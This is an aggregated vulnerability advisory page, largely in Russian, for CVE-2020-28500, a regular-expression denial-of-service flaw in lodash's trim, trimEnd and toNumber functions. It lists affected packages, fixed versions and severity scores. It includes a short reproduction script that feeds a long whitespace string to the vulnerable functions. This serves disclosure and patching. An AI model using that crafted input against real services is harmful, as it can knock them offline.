exploitDog

GHSA-29mw-wpgm-hmr9

Опубликовано: 06 янв. 2022

Источник: github

Github: Прошло ревью

CVSS3: 5.3

Описание

Regular Expression Denial of Service (ReDoS) in lodash

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash'); function build_blank(n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0); var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1); var time2 = Date.now(); lo.trimEnd(s); var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2);

Ссылки

Пакеты

Наименование

lodash

npm

Затронутые версииВерсия исправления

< 4.17.21

4.17.21

Наименование

lodash-es

npm

Затронутые версииВерсия исправления

< 4.17.21

4.17.21

Наименование

lodash.trimend

npm

Затронутые версииВерсия исправления

<= 4.5.1

Отсутствует

Наименование

lodash.trim

npm

Затронутые версииВерсия исправления

<= 4.5.1

Отсутствует

Наименование

lodash-rails

rubygems

Затронутые версииВерсия исправления

< 4.17.21

4.17.21

EPSS

Процентиль: 43%

0.00202

Низкий

5.3 Medium

CVSS3

CVE ID

Дефекты

CWE-1333

CWE-400

Связанные уязвимости

CVE-2020-28500

CVSS3: 5.3

ubuntu

больше 4 лет назад

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

CVE-2020-28500

CVSS3: 5.3

redhat

больше 4 лет назад

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

CVE-2020-28500

CVSS3: 5.3

nvd

больше 4 лет назад

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

CVE-2020-28500

CVSS3: 5.3

debian

больше 4 лет назад

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression ...

BDU:2021-02880

CVSS3: 7.3

fstec

около 4 лет назад

Уязвимость функций toNumber, trim и trimEnd библиотеки lodash прикладного программного обеспечения Аврора Центр, связанная с неконтролируемым расходом ресурсов, позволяющая нарушителю вызвать отказ в обслуживании

EPSS

Процентиль: 43%

0.00202

Низкий

5.3 Medium

CVSS3

CVE ID

Дефекты

CWE-1333

CWE-400